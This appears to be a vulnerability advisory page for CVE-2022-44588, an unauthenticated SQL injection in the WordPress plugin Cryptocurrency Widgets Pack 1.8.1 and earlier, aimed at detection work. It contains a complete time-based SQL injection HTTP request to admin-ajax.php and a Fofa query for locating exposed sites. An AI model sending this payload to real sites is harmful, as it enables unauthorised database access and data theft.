🔙 목록으로 돌아가기

CVE-2022-44588: Cryptocurrency Widgets Pack <= 1.8.1 - SQL Injection

TitleCryptocurrency Widgets Pack <= 1.8.1 - SQL Injection
AuthorShivam Kamboj
SeverityCritical
ImpactAttackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion of sensitive information.
RemediationUpdate to the latest version of the plugin where the vulnerability is fixed.
CVSS Score9.8
EPSS Score0.33174
CVE IDCVE-2022-44588
CWE IDCWE-89
Fofa Querybody="wp-content/plugins/cryptocurrency-widgets-pack"
Tags cve cve2022 wordpress wp wp-plugin sqli cryptocurrency-widgets-pack unauth

🔍 Vulnerability Description

Cryptocurrency Widgets Pack Plugin <=1.8.1 for WordPress contains an unauthenticated SQL injection caused by unsanitized user input in database queries, letting attackers execute arbitrary SQL commands, exploit requires no authentication.

🌐 HTTP Request

GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&draw=1&start=0&length=10&columns[0][name]=EXP(~(SELECT*FROM(SELECT+SLEEP(8))x))&order[0][column]=0&order[0][dir]=ASC HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/59.0
Connection: close
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-44588.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-44588.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A